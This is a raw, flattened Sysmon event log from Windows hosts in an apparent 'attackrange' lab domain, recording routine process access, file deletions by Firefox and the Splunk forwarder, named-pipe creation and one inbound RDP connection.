09:19:05.436{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F2D-614D-0700-00000000FC01}480C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052208Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.869{5EBD8912-79C0-6151-E577-00000000FC01}4296ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.dbMD5=F6EB7486D8E522C14F09AABB4D14989D,SHA256=B64185DF6119B1E2EE635CF00BEB8773ED02A915ECB9215A716AE70FC495469B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052207Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.869{5EBD8912-79C0-6151-E577-00000000FC01}42962004C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052206Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.869{5EBD8912-79C0-6151-E577-00000000FC01}42962004C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052205Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.853{5EBD8912-79C0-6151-E577-00000000FC01}42964848C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001052204Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.853{5EBD8912-79C0-6151-E577-00000000FC01}42964848C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+b6c18|C:\Windows\System32\TwinUI.dll+b7777|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+37c8f|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+34376|C:\Windows\System32\combase.dll+33b2a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 23542300x80000000000000001052203Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.853{5EBD8912-79C0-6151-E577-00000000FC01}4296ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\IconCache.dbMD5=59CA59779DFBBB08526929D435AA631C,SHA256=3EE3D3E272CE33D9B15E953DF834FB0E803F40F4385524F560ACD4D188A532C7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052202Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.853{5EBD8912-79C0-6151-E577-00000000FC01}42967028C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052201Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.853{5EBD8912-79C0-6151-E577-00000000FC01}42967028C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052200Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.698{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBEE763A8E9CACE84A35048EAA445058,SHA256=39989892B646B329DBA184E15BE3ED493601A857009FA5F4277D78F5DE4E46F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980301Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:06.530{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E8D5DEBD26D8FA1F13754907AE3ABBAE,SHA256=28474002ABD26DA1C7D3009963970D2A812ABE18FEC5A050EEFCCCCEF794A22F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980300Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:03.667{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse13.235.255.213ec2-13-235-255-213.ap-south-1.compute.amazonaws.com52964-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980299Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:06.015{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F895ACDBA0F6BE86B2ADFCB5ED61E07,SHA256=A2F722C65440DFB18D1B5BC5F42026EB3A8D981078E53810ED50F5223F662765,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052199Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.487{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=5D598A6602E71AACA020DFA5A72DF678,SHA256=D1866B9663671500E1DA84F36682AB5CDFB3B25AFBB18E18F380474507CBD520,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052198Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.487{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=AB642DB822007B74B0F94FC59CA3DCE9,SHA256=8829F0774FD6AD837FB1BF7180594C73532DC709CBEB1BC0973A7C39772BFE82,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052197Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.456{5EBD8912-7F30-614D-0D00-00000000FC01}8885152C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052196Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.456{5EBD8912-7F30-614D-0D00-00000000FC01}8885152C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+f8c6|c:\windows\system32\rpcss.dll+1255a|c:\windows\system32\rpcss.dll+77ac|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052195Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.441{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\datareporting\aborted-session-pingMD5=71E8773DAFA75F84E501B87E13408C88,SHA256=7D6371AAA7C1C57B9AE602CED8779C962B5C1F6193E31BD6B57DBEEB98B8560C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052194Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.441{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0F103FD4E377C1EAB6704D931771D50,SHA256=0168112ACB4B263E8AAFC3FDEC32A47EFCC7B5FD1E0A3DE55C6400F40EF7E6B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052193Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.441{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA53CBA6A8F01CEA374118278FF05E40,SHA256=D34CBBB94F44F14450B29C1879A455EEA541CD37C78D1B8EC4A8363B3E0C1937,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052192Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.372{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage.sqlite-journalMD5=DEA290F655BE18278B9BF7DA93F6582F,SHA256=4068AAFDFDE215EF3FEA8DB55403A8246D8EF58C9B4A674EFAF5681D3CD6F8A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052191Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.356{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\cookies.sqlite-walMD5=1E5B84A5CB1F9240ED55FC48E2775002,SHA256=DC5E4A3D5A34CFDAC838F422EFC374A6ABD89FDED68FBD4A79132994F71FAD30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052190Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.341{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\cookies.sqlite-shmMD5=90E42B94DEC34B8D0E8DB781E31E1F92,SHA256=36D3F1CA5B820C2E96A0E9BF8F2FB49679EEFCE095C99155654ED9CD58C92146,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052189Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.341{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\favicons.sqlite-walMD5=FA47FEE7F2BD11CF0EEBC92990E316C5,SHA256=C002821D5FCB2CBA182A07C6B048C31F946410C1632189FE84D7383B4AA2FC4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052188Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.319{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\favicons.sqlite-shmMD5=030F119EBCFB1F2ABD011485BC9E64DC,SHA256=38D30FA685095D7356FC2CAAE870E023818F426E4209101B4D94B8D24120D719,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052187Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.303{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\places.sqlite-walMD5=099FAC493ABE8E757BD956A69830D086,SHA256=D6BBB6DB1D053228F67C8470821BC7DF5A50E0E9270EBAB83EC455214F5D7AA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052186Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.303{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC5D856A4A76169B92B09EF8AF7A2BA7,SHA256=FECF53FE381F6D96F7192F4319A7FE630DCB2162099FB2D9599D5B1A6373B042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052185Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.288{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\places.sqlite-shmMD5=4F857DC7C99D75B89E86E815A0505C8E,SHA256=CE5D0C9CCB30E135B6EA3470319970A13EBE4B34F0311B26F614F8CF9F6E5039,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001052184Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:19:06.272{5EBD8912-7B3A-6151-3A78-00000000FC01}7120\chrome.7120.24.135057104C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001052183Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:19:06.257{5EBD8912-7B3A-6151-3A78-00000000FC01}7120\chrome.7120.23.65600178C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001052182Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:19:06.257{5EBD8912-7B3A-6151-3A78-00000000FC01}7120\chrome.7120.22.29076162C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001052181Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.257{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\default\https+++dmcxblue.gitbook.io\idb\3547115956fbiDreegbaarsoetLSolc.sqlite-walMD5=A7D78E4558FF4DDC8149D86BCE00D803,SHA256=D09BF3808337677C7C75566D77B867B9D50675F2D3ACBC3E705D535BF41E98A1,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001052180Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:19:06.257{5EBD8912-7B3A-6151-3A78-00000000FC01}7120\chrome.7120.21.204961440C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001052179Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.257{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\default\https+++dmcxblue.gitbook.io\idb\3547115956fbiDreegbaarsoetLSolc.sqlite-shmMD5=6A5B9A11E1106DCD7189CADF02CC5542,SHA256=B813CFF5F7029E3014F7DA44197930F31361AE38DEFFD5148DAE1B10DE503363,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001052178Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:19:06.257{5EBD8912-7B3A-6151-3A78-00000000FC01}7120\chrome.7120.20.190927370C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000001052177Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.241{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-84A1-6151-6779-00000000FC01}2988C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2fb50|C:\Program Files\Mozilla Firefox\xul.dll+e4cd19|C:\Program Files\Mozilla Firefox\xul.dll+e485b9|C:\Program Files\Mozilla Firefox\xul.dll+e3f25c|C:\Program Files\Mozilla Firefox\xul.dll+1eed842|C:\Program Files\Mozilla Firefox\xul.dll+19f1947|C:\Program Files\Mozilla Firefox\xul.dll+19f30a0|C:\Program Files\Mozilla Firefox\xul.dll+1b66a7e|C:\Program Files\Mozilla Firefox\xul.dll+1d25fa7|UNKNOWN(0000026DBAAE3E5F) 10341000x80000000000000001052176Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.241{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B40-6151-3F78-00000000FC01}6828C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2fb50|C:\Program Files\Mozilla Firefox\xul.dll+e4cd19|C:\Program Files\Mozilla Firefox\xul.dll+e485b9|C:\Program Files\Mozilla Firefox\xul.dll+e3f25c|C:\Program Files\Mozilla Firefox\xul.dll+1eed842|C:\Program Files\Mozilla Firefox\xul.dll+19f1947|C:\Program Files\Mozilla Firefox\xul.dll+19f30a0|C:\Program Files\Mozilla Firefox\xul.dll+16c43e8|C:\Program Files\Mozilla Firefox\xul.dll+1b5e147|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+13b3ea|C:\Program Files\Mozilla Firefox\xul.dll+1272353|C:\Program Files\Mozilla Firefox\xul.dll+1b6754f|C:\Program Files\Mozilla Firefox\xul.dll+1b5e39d|C:\Program Files\Mozilla Firefox\xul.dll+177b82f|C:\Program Files\Mozilla Firefox\xul.dll+172d316|UNKNOWN(0000026DBAAE1E84) 11241100x80000000000000001052175Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.241{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\SiteSecurityServiceState.txt2021-09-27 08:10:19.295 23542300x80000000000000001052174Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.241{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\SiteSecurityServiceState.txtMD5=FBCADEECA935AA9F8957602D444FA37D,SHA256=304E081D90FC9F77C10D82A001DF27DD3AF13BF29E0E8B47EFB7A468E18AD5DF,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001052173Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.241{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\AlternateServices.txt2021-09-27 08:10:19.712 23542300x80000000000000001052172Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.241{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\AlternateServices.txtMD5=1EAFDEEF53BDA6B53F24A6A7C8D5603A,SHA256=11AE527593814CC8DB8F6046DE23C69D787CD7AE580E81957CA7653854583BB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052171Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.239{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\webappsstore.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052170Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.219{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 